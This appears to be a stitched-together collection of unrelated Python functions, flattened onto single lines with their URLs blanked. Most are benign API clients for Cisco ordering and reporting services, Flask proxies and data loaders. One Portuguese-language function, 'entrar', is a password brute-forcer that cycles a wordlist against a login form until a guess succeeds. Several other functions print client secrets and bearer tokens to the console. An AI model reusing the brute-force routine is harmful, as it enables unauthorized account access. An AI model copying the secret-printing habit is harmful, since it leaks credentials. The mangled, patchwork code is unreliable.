def teams_notification(username, raw_ccwr_output_csv): with open("teams_token.json", "r") as f: token = load(f) token = token["bearer_token"] url = "{username}".format( username=username) headers = {'Authorization': 'Bearer {token}'.format(token=token)} response = rq("GET", url, headers=headers) result = response.json() id = result["items"][0]["id"] url = "" payload = MultipartEncoder({ "toPersonId": id, "text": "Your latest report from is ready for download.", "files": (raw_ccwr_output_csv, open(raw_ccwr_output_csv, "rb"), "text/csv") }) headers = { 'Authorization': 'Bearer {token}'.format(token=token), 'Content-Type': payload.content_type } response = rq("POST", url, headers=headers, data=payload) result = response.json() print("Notification sent to {username}".format(username=username)) print(result)
def grab_oauth_ccwr(username): """Function for ccw-r api oauth""" url = "" with open("ccwr_client.json", "r") as f: client_creds = load(f) print(client_creds) payload = "client_id=%s&client_secret=%s&grant_type=client_credentials" % ( client_creds["client_id"], client_creds["client_secret"], ) headers = { "Content-Type": "application/x-www-form-urlencoded", "Accept": "*/*", "Cache-Control": "no-cache", "Host": "", "Accept-Encoding": "gzip, deflate", "Content-Length": "103", "Connection": "keep-alive", "cache-control": "no-cache", } print(headers) response = rq("POST", url, data=payload, headers=headers) ccwr_access_token = response.json()["access_token"] print(ccwr_access_token) with open("profiles//%s//ccwr_oauth.json" % username, "w") as f: dump({"ts": int(time()), "access_token": ccwr_access_token}, f) return ccwr_access_token
def proxy(path): args = request.args.to_dict(flat=False) args["userId"] = current_user.get_id() try: custom_logger.handle.error( "I AM CALLED... AND NOW I AM CALLING CONFIGURATOR") resp = rq( method=request.method, # url=request.url.replace(request.host_url, ''), url=f'{os.environ.get("CONFIGURATOR_URL")}configurator/{path}', params=args, headers={ key: value for (key, value) in request.headers if key != 'Host' }, data=request.get_data(), # cookies=request.cookies, allow_redirects=False) except: custom_logger.handle.error("FAILED TO REACH CONFIGURATOR") abort(HTTPStatus.INTERNAL_SERVER_ERROR, str("FAILED TO REACH CONFIGURATOR")) excluded_headers = [ 'content-encoding', 'content-length', 'transfer-encoding', 'connection' ] headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers] custom_logger.handle.error(f"CONFIGURATOR_STATUS_CODE: {resp.status_code}") response = Response(resp.content, resp.status_code, headers) return response
def execute(trial=False): '''Retrieve necessary data set.''' startTime = # Set up the database connection. client = dml.pymongo.MongoClient() repo = client.repo repo.authenticate('asambors_maxzm', 'asambors_maxzm') data_urls = { "hospitals": '', "energywater": '', "ziptoincome": '', "zipcodetolatlong": '' } for key in data_urls: url = data_urls[key] response = urllib.request.urlopen(url).read().decode("utf-8") r = json.loads(response) repo.dropCollection(key) repo.createCollection(key) repo['asambors_maxzm.' + key].insert_many(r) repo['asambors_maxzm.' + key].metadata({'complete': True}) # Using SODA API so different format for request sleep_soda_api = '$offset=13908&$limit=515' response = rq(method="GET", url=sleep_soda_api) sleep_data = response.json() repo.dropCollection('nosleepma') repo.createCollection('nosleepma') repo['asambors_maxzm.nosleepma'].insert_many(sleep_data) repo['asambors_maxzm.nosleepma'].metadata({'complete': True}) repo.logout() endTime = return {"start": startTime, "end": endTime}
def proxy(path): request.args["userId"] = current_user.get_id() resp = rq( method=request.method, # url=request.url.replace(request.host_url, ''), url=f'{os.environ.get("CONFIGURATOR_URL")}{path}', params=request.args, headers={ key: value for (key, value) in request.headers if key != 'Host' }, data=request.get_data(), # cookies=request.cookies, allow_redirects=False) excluded_headers = [ 'content-encoding', 'content-length', 'transfer-encoding', 'connection' ] headers = [(name, value) for (name, value) in resp.raw.headers.items() if name.lower() not in excluded_headers] response = Response(resp.content, resp.status_code, headers) return response
def entrar(): try: os.system('clear') Banner() print('{0}Aguarde!'.format(Y)) sleep(2) ler = open(passw, 'r') for emails in list_users: print("{0}{1}".format(Y, emails)) for pwd in ler.readlines(): senha = pwd.rstrip() request = rq( "", data={ "email": str(user), "pass": str(senha), "login": "******" }) print('{0}[-] {1}Decifrando Senha ------> {2}'.format( R, N, senha)) if not "Login" in request.text: print('\n{0}#####################################################'. format(N)) print('{0} [+] {1}Senha Decifrada -----> {2}{3}'.format( G, Y, G, senha)) print('{0}######################################################'. format(N)) exit() except IOError: print("Arquivo nao encontrado") except KeyboardInterrupt: print('\n{0}Saindo'.format(R)) sleep(3) except Exception: print('{0}[-] Por favor verifique a Conexão'.format(R))
def grab_oauth_ccw_order(username, password): """function for ccw order api oauth""" try: with open("ccw_order_cred.json", "r") as f: password_creds = load(f) cred_tuple = ( password_creds["client_id"], password_creds["client_secret"], username, password, ) url = "" payload = ( "client_id=%s&client_secret=%s&grant_type=password&username=%s&password=%s" % cred_tuple) headers = { "Content-Type": "application/x-www-form-urlencoded", "Accept": "application/json", "cache-control": "no-cache", } except FileNotFoundError: print("ccw_order_cred.json is missing...correct this problem") return None try: response = rq("POST", url, data=payload, headers=headers) ccwo_access_token = response.json()["access_token"] if "profiles" not in os.listdir(): os.mkdir("profiles") if username not in os.listdir("profiles"): os.mkdir("profiles//%s" % username) os.mkdir("profiles//%s//reports" % username) with open("profiles//%s//ccw_order_oauth.json" % username, "w") as f: dump({"ts": int(time()), "access_token": ccwo_access_token}, f) return ccwo_access_token except KeyError: return None
def get_closest_path(info, G): obesity_stops = [(stop['stop_id'], stop['rect_lat'], stop['rect_lon']) for stop in info['obesity_locations']['stops'] if stop['mode'] == 'Subway'] healthy_stops = [(stop['stop_id'], stop['rect_lat'], stop['rect_lon']) for stop in info['healthy_locations']['stops'] if stop['mode'] == 'Subway'] origin_long = info['obesity_locations']['obesity']['geolocation'][ 'rect_lon'] origin_lat = info['obesity_locations']['obesity']['geolocation'][ 'rect_lat'] dest_lat = info['healthy_locations']['healthy_locations'][ 'rect_location'][0] dest_long = info['healthy_locations']['healthy_locations'][ 'rect_location'][1] google_key = dml.auth['services']['googlemaps']['key'] base_link = "" origin = "origin=" + str(origin_lat) + "," + str(origin_long) destination = "&destination=" + str(dest_lat) + "," + str(dest_long) bus_mode = "&mode=transit&transit_mode=bus" walk_mode = "&mode=walking" api_key = "&key=" + google_key # print('obesity stops length:', len(obesity_stops), 'healthy stops length:', len(obesity_stops)) min_times = [] for o_stop, o_stop_lat, o_stop_long in obesity_stops: for h_stop, h_stop_lat, h_stop_long in healthy_stops: try: time = nx.dijkstra_path_length(G, o_stop, h_stop) # Find walking distance/duration from start to o_stop o_stop_coords = "&destination=" + str( o_stop_lat) + "," + str(o_stop_long) walking_to_url = base_link + origin + o_stop_coords + walk_mode + api_key response = rq(method="GET", url=walking_to_url) raw = response.json() total_added_time_for_walking = 0 for route in raw['routes']: tots = 0 for leg in route['legs']: time_in_seconds = leg['duration']['value'] tots += time_in_seconds tots /= 60.0 total_added_time_for_walking += tots # Find walking distance/duration from h_stop to stop h_stop_coords = "origin=" + str(h_stop_lat) + "," + str( h_stop_long) walking_from_url = base_link + h_stop_coords + destination + walk_mode + api_key response = rq(method="GET", url=walking_from_url) raw = response.json() # print("RESPONSE TEXT IS {}".format(response.text)) for route in raw['routes']: tots = 0 for leg in route['legs']: time_in_seconds = leg['duration']['value'] tots += time_in_seconds tots /= 60.0 total_added_time_for_walking += tots # print('TIME IS {}'.format(time + total_added_time_for_walking)) min_times.append(time + total_added_time_for_walking) except nx.NetworkXNoPath: pass # obesity_bus_stops = [ stop['stop_id'] for stop in info['obesity_locations']['stops'] if stop['mode'] != 'Subway' ] # healthy_bus_stops = [ stop['stop_id'] for stop in info['healthy_locations']['stops'] if stop['mode'] != 'Subway' ] # print("Origin lat long {} {} and destination lat long {} {}".format(origin_lat, origin_long, dest_lat, dest_long)) bus_link = base_link + origin + destination + bus_mode + api_key response = rq(method="GET", url=bus_link) raw_json = response.json() for route in raw_json['routes']: sum = 0 for leg in route['legs']: time_in_seconds = leg['duration']['value'] sum += time_in_seconds sum /= 60.0 min_times.append(sum) # # print("Origin lat long {} {} and destination lat long {} {}".format(origin_lat, origin_long, dest_lat, dest_long)) if len(min_times) == 0: info['min_travel_time'] = sys.maxsize else: info['min_travel_time'] = min(min_times) # print("MIN TRAVEL TIME {}".format(info['min_travel_time'])) # print(min_times) # print('info is\n' + str(info)) return info
def ccwo_search_request(username, so_list=[]): """ccw order search function""" try: with open("profiles//%s//ccw_order_oauth.json" % username, "r") as f: jl = load(f) print("ccw order oauth2 token age: " + str(int(time()) - jl["ts"]) + " seconds.") ccwo_access_token = jl["access_token"] except FileNotFoundError as e: print(e) pass url = "" headers = { "Accept": "application/json", "Content-Type": "application/json", "Request-ID": "Type: Integer", "Accept-Language": "en_us", "Authorization": "Bearer %s" % ccwo_access_token, "cache-control": "no-cache", "Host": "", "Accept-Encoding": "gzip, deflate", "Connection": "keep-alive", } ccwo_sn_list = [] ccwo_error_so_list = [] so_data_matrix_header = [[ "Sales Order Number", "Line Number", "Part Number", "Quantity" ]] so_data_matrix = [] for so_num in so_list: try: pageNumber = 1 payload = dumps({ "serialNumberRequest": { "salesOrderNumber": so_num, "pageNumber": str(pageNumber), } }) response = rq("POST", url, data=payload, headers=headers) rj = response.json() so_data_matrix = so_data_matrix + [[ so_num, i["lineNumber"], i["partNumber"], i["quantity"] ] for i in rj["serialNumberResponse"]["serialDetails"]["lines"]] # print(dumps(rj, sort_keys=True, indent=4)) total_pages = int( rj["serialNumberResponse"]["responseHeader"]["totalPages"]) if total_pages > 1: # print("SO# %s totalPages is great than 1"%str(so_num)) pageNumber = 2 for i in range(total_pages - 1): payload = dumps({ "serialNumberRequest": { "salesOrderNumber": so_num, "pageNumber": str(pageNumber), } }) addtl_page = rq("POST", url, data=payload, headers=headers) addtl_page = addtl_page.json() so_data_matrix = so_data_matrix + [[ so_num, i["lineNumber"], i["partNumber"], i["quantity"] ] for i in addtl_page["serialNumberResponse"] ["serialDetails"] ["lines"]] pageNumber += 1 # print(addtl_page) rj["serialNumberResponse"]["serialDetails"]["lines"] = ( rj["serialNumberResponse"]["serialDetails"]["lines"] + addtl_page["serialNumberResponse"]["serialDetails"] ["lines"]) sn_parse1 = [ i for i in rj["serialNumberResponse"]["serialDetails"]["lines"] ] sn_parse2 = [i["serialNumbers"] for i in sn_parse1] # print(dumps(sn_parse2, indent=4)) print( rj["serialNumberResponse"]["responseHeader"]["totalPages"] + " is the total number of pages in the CCWO response for SO#%s" % so_num) for i in sn_parse2: for j in i: ccwo_sn_list.append(str(j["serialNumber"])) except Exception: print(str(so_num) + " SO# could not be retrieved") ###logger.debug(so_num + " SO# could not be retrieved") ccwo_error_so_list.append(so_num) # print(str(so_num)+' cannot be retrieved from ccw.') continue print(str(len(ccwo_sn_list)) + " is the length of the ccwo sn list.") # print(ccwo_sn_list) ##logger.debug(ccwo_sn_list) so_data_matrix.sort() so_data_matrix = so_data_matrix_header + so_data_matrix return ccwo_sn_list, ccwo_error_so_list, so_data_matrix
def ccwr_search_request(username, searchType="serialNumbers", search_list=[]): """ccw-r search function""" try: with open("profiles//%s//ccwr_oauth.json" % username, "r") as f: jl = load(f) print("ccwr oauth2 token age: " + str(int(time()) - jl["ts"]) + " seconds.") if (time() - jl["ts"]) > 3500: ccwr_access_token = grab_oauth_ccwr(username) else: ccwr_access_token = jl["access_token"] except: ccwr_access_token = grab_oauth_ccwr(username) url = "" headers = { "Accept": "application/json", "Content-Type": "application/json", "Request-ID": "Type: Integer", "Accept-Language": "en_us", "Authorization": "Bearer %s" % ccwr_access_token, "Cache-Control": "no-cache", "Host": "", "Accept-Encoding": "gzip, deflate", "Content-Length": "113", "Connection": "keep-alive", "cache-control": "no-cache", } offset = 0 payload = dumps({ searchType: search_list, "limit": 1000, "offset": offset, "configurations": True, }) with open('counter_dict.json', 'r') as f: counter_dict = load(f) current_hr = int(ctime().split()[3].split(':')[0]) current_dt = ctime().split()[1:3] if (current_hr != counter_dict['current_hr']) or ( current_dt != counter_dict['current_dt']): with open('counter_dict.json', 'w') as f: counter_dict['current_hr'] = current_hr counter_dict['page_counter'] = 0 counter_dict['over'] = False counter_dict['current_dt'] = current_dt dump(counter_dict, f) if counter_dict['over'] == False: response = rq("POST", url, data=payload, headers=headers) if response.status_code == 403: ccwr_access_token = grab_oauth_ccwr() headers["Authorization"] = "Bearer %s" % ccwr_access_token response = rq("POST", url, data=payload, headers=headers) else: ccwr_response = response.json() try: counter_dict['page_counter'] = counter_dict['page_counter'] + ( int(ccwr_response["totalRecords"] / 1000) + 1) except: pass with open('counter_dict.json', 'w') as f: if counter_dict['page_counter'] > 298: counter_dict['over'] = True ts = str(int(time())) with open('jobs/%s.%s' % (username, ts), 'w') as job: dump(search_list, job) print( '\n\n\nDo some scheduling, the paging counter just went over!\n\n\n' ) dump(counter_dict, f) ccwr_response = 'over' return ccwr_response, ccwr_access_token dump(counter_dict, f) if counter_dict['over'] == True: ccwr_response = 'over' ts = str(int(time())) if search_list != []: with open('jobs/%s.%s' % (username, ts), 'w') as job: dump(search_list, job) return ccwr_response, ccwr_access_token else: response = None try: if int(ccwr_response["totalRecords"]) > 1000: additional_requests = int( int(ccwr_response["totalRecords"]) / 1000) for i in range(additional_requests): offset += 1000 payload = dumps({ searchType: search_list, "limit": 1000, "offset": offset, "configurations": True, }) addtl_response = rq("POST", url, data=payload, headers=headers) addtl_response = addtl_response.json() ccwr_response["instances"] = (ccwr_response["instances"] + addtl_response["instances"]) return ccwr_response, ccwr_access_token except: return None, ccwr_access_token
def ccwo_order_status(username, so_num): try: with open("profiles//%s//ccw_order_oauth.json" % username, "r") as f: jl = load(f) ccwo_access_token = jl["access_token"] except Exception as e: print(e) url = "" headers = { "Accept": "application/json", "Content-Type": "application/json", "Request-ID": "Type: Integer", "Accept-Language": "en_us", "Authorization": "Bearer %s" % ccwo_access_token, "cache-control": "no-cache", "Host": "", "Accept-Encoding": "gzip, deflate", "Connection": "keep-alive", } if so_num.startswith("8"): payload = dumps({ "GetPurchaseOrder": { "value": { "DataArea": { "PurchaseOrder": [{ "PurchaseOrderHeader": { "ID": { "value": "" }, "DocumentReference": [{ "ID": { "value": so_num } }], "SalesOrderReference": [{ "ID": { "value": "" } }], "Description": [{ "value": "Yes", "typeCode": "details" }], } }] }, "ApplicationArea": { "CreationDateTime": "datetime", "BODID": { "value": "BoDID-test", "schemeVersionID": "V1" }, }, } } }) else: payload = dumps({ "GetPurchaseOrder": { "value": { "DataArea": { "PurchaseOrder": [{ "PurchaseOrderHeader": { "ID": { "value": "" }, "DocumentReference": [{ "ID": { "value": "" } }], "SalesOrderReference": [{ "ID": { "value": so_num } }], "Description": [{ "value": "Yes", "typeCode": "details" }], } }] }, "ApplicationArea": { "CreationDateTime": "datetime", "BODID": { "value": "BoDID-test", "schemeVersionID": "V1" }, }, } } }) response = rq("POST", url, data=payload, headers=headers) result = response.json() result = \ result["ShowPurchaseOrder"]["value"]["DataArea"]["PurchaseOrder"][0]["PurchaseOrderHeader"]["Extension"][4]["Name"][ 0]["value"] result = {so_num: result} return result